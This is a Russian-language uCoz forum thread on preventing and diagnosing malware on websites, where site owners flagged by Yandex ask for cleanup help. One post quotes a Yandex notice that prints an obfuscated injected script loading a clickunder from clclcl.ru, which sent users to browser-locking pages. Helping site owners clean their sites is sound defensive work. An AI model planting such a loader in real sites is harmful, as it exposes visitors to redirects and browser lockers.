Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Rostyk3304
    Сообщений: 4
    Репутация: 0

    Сообщение # 2086 | 01:36:48 13 Июл 2016
    Очень благодарен!!! Изменил код плеера "онлайн тв" на ваш! Все работает отлично!

    так же удалил код кликандера...
    Посмотрю, если не разблокирует перейду на "гугл адсенс"!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2087 | 10:01:12 13 Июл 2016
    Rostyk3304, если все почистили, то нажмите проверить на вкладке безопасность в вебмастере яндекса. ориентировочное время ожидания снятия фильтра около трех недель. если будет все равно что-то не так, вам ответят что проблема осталась. перейдите в яндекс вебмастер бету и посмотрите есть ли ещё проблемы с сайтом
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Rostyk3304
    Сообщений: 4
    Репутация: 0

    Сообщение # 2088 | 18:18:13 13 Июл 2016
    НЕт это все таки клик андер от БодиКлик!

    Yandex.Search support <search@support.yandex.com>
    12:48 (5 ч. назад)

    кому: мне
    Здравствуйте!

    В настоящий момент с Вашим сайтом все в порядке, он успешно прошёл перепроверку. Пометка в результатах поиска должна автоматически исчезнуть в течение нескольких часов.

    Ранее на http://knopa.info/forum/84-4088-1 присутствовал следующий вредоносный код:
    <script>
    var siteid=66767;
    var cats='14,32,17,10,15,30';
    var adult='1';
    document.write('<scr'+'ipt charset="windows-1251" type="text/jav'+'ascript" src="http://clclcl.ru/click'+'under.js?'+Math.random()+'"></scr'+'ipt>');
    </script>
    При выполнении данного кода в ряде случаев пользователи перенаправлялись на скрипты, блокирующие работу браузера (бровлоки).
    Алексей555
    Сообщений: 2
    Репутация: 0

    Сообщение # 2089 | 20:47:06 22 Июл 2016
    удалено. сайт не на uCoz
    Fenix0905
    Сообщений: 42
    Репутация: 3

    Сообщение # 2090 | 23:49:36 24 Авг 2016
    Здравствуйте. На днях увидел что в поиске яндекс мой сайт занес в опасные:
    "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных". При посещении сайта обнаружил следующее. Когда кликаешь в любом месте сайта, открывается еще один сайт. Сторонних скриптов вроде бы не ставил, стоит реклама от "БодиКлик" и партнерки "Адмитад". При проверке сайта на вирусы сканером "rescan.pro" увидел следующее:
    3 критических замечания6 предупреждений


    где как раз и указана ссылка на тот злосчастный сайт который открывается
    Цитата
    http://clclcl.ru/clickunder.js?<SCRIPT>

    Самостоятельно данный код нигде не нашел, помогите пожалуйста избавиться от вредителя и вернуть сайту доброе имя
    Прикрепления: 1401298.jpg (107.5 Kb) · 1019325.jpg (172.2 Kb)
    Сообщение отредактировал Fenix0905 - Среда, 24 Авг 2016, 23:51:03
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2091 | 23:57:03 24 Авг 2016
    Fenix0905, адрес сайта нужен а не картинки. боди клик удалять надо по-любому в первую очередь. на все остальное надо смотреть
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Fenix0905
    Сообщений: 42
    Репутация: 3

    Сообщение # 2092 | 23:27:49 25 Авг 2016
    Цитата webanet ()
    адрес сайта нужен а не картинки
    Так он и есть на скрине, просто нехотелл что бы посчитали за рекламу лишнюю ссыль
    Адрес сайта:
    Код
    http://www.yagotin-city.com.ua/
    Сообщение отредактировал Fenix0905 - Четверг, 25 Авг 2016, 23:28:13
    arskat
    Сообщений: 95
    Репутация: 41

    Сообщение # 2093 | 14:13:20 28 Авг 2016
    Здравствуйте!
    Уже некоторое время Яндекс выдаёт вот это (скрин ниже):



    Перейдя в Яндекс Вебмастер, он мне показал около 15 страниц сайта заражёнными. Спустя неделю, посмотрев ещё раз в Вебмастере увидел уже не 15 страниц а 8 всего.
    Вопрос, если удалить просто эти 8 страниц, то проблема исчезнет или Яндекс опять найдёт что то в другом месте, и лучше найти всё таки этот вирус?

    Сейчас он мне вирусы показывает именно на этих страницах сайта:

    http://arskat.ru/load....1-0-264

    http://arskat.ru/load....-1-0-18

    http://arskat.ru/load....-1-0-84

    http://arskat.ru/gb/

    http://arskat.ru/load/klipy_dok_filmy/deva_premal_klipy/9-1-0-324

    http://arskat.ru/load....-1-0-81

    http://arskat.ru/load....-1-0-82

    http://arskat.ru/load/muzyka_mp3/pesni_iz_kinofilmov_sssr/5-1-0-163

    Помогите пожалуйста найти этот вирус, если он конечно есть. И подскажите где его именно "убить".
    --------------------------------------------

    Проверил некоторыми антивирусными онлайн сайтами, и вот итог:

    удалено

    это всё мне ничего не говорит, может Вы знаете что это и где, и в этом ли причина?
    Прикрепления: 1500447.jpg (25.9 Kb)
    http://arskat.ru/
    http://arskat.do.am/
    http://photo-ars.ru/
    http://torrent-ars.do.am/
    Сообщение отредактировал webanet - Воскресенье, 28 Авг 2016, 18:38:20
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2094 | 18:30:04 28 Авг 2016
    arskat, удалите рекламу кликандера обязательно и больше не ставьте. и удалить это
    Код
    <script type="text/javascript" src="/js/jquery.min.js"></script>

    яндекс только страницы указывает? образцы вредоносного кода не дает?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    arskat
    Сообщений: 95
    Репутация: 41

    Сообщение # 2095 | 18:38:42 28 Авг 2016
    webanet, Кликандер нашёл вроде и удалил, я даже незнал, не помнил что он там стоит. А тот скрипт что указали где искать?

    -------
    Яндекс вот это показывает:

    Прикрепления: 9692113.jpg (71.1 Kb)
    http://arskat.ru/
    http://arskat.do.am/
    http://photo-ars.ru/
    http://torrent-ars.do.am/
    Сообщение отредактировал arskat - Воскресенье, 28 Авг 2016, 18:45:42
    QVEST0893
    Сообщений: 59
    Репутация: 41

    Сообщение # 2096 | 18:40:41 28 Авг 2016
    arskat, Вы сами тизеры поставили чему удивляться. У Яндекса они табу он за них вас и блочит. Через них часто подписки и вредоносное ПО распространяют. Если хотите с ним дружить от таких партнерок придется отказаться.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2097 | 18:44:04 28 Авг 2016
    arskat, после очистки в вебмастере отдайте сайт на перепроверку
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    arskat
    Сообщений: 95
    Репутация: 41

    Сообщение # 2098 | 19:21:26 28 Авг 2016
    QVEST0893, Тизеры да, ставил, но не помнил что дополнительно и кликандер бабахнул на сайт, давно это было.

    Добавлено (28 Авг 2016, 18:48:29)
    ---------------------------------------------
    webanet, Я тот скрипт что Вы писали незнаю где искать,
    
    Код
    <script type="text/javascript" src="/js/jquery.min.js"></script>

    кликандер убрал.

    Добавлено (28 Авг 2016, 19:21:26)
    ---------------------------------------------
    Цитата webanet ()
    <script type="text/javascript" src="/js/jquery.min.js"></script>

    Так это где искать, замучился не нахожу, может подскажете?
    http://arskat.ru/
    http://arskat.do.am/
    http://photo-ars.ru/
    http://torrent-ars.do.am/
    Сообщение отредактировал arskat - Воскресенье, 28 Авг 2016, 19:22:24
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2099 | 19:31:33 28 Авг 2016
    arskat, быстрой заменой удаляйте или в файловом менеджере в папке js удалите файл с именем jquery.min.js
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    arskat
    Сообщений: 95
    Репутация: 41

    Сообщение # 2100 | 19:39:29 28 Авг 2016
    webanet, Спасибо, удалил.
    Дело было в кликандере и в этом скрипте? сайт теперь получается - чистый?
    http://arskat.ru/
    http://arskat.do.am/
    http://photo-ars.ru/
    http://torrent-ars.do.am/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: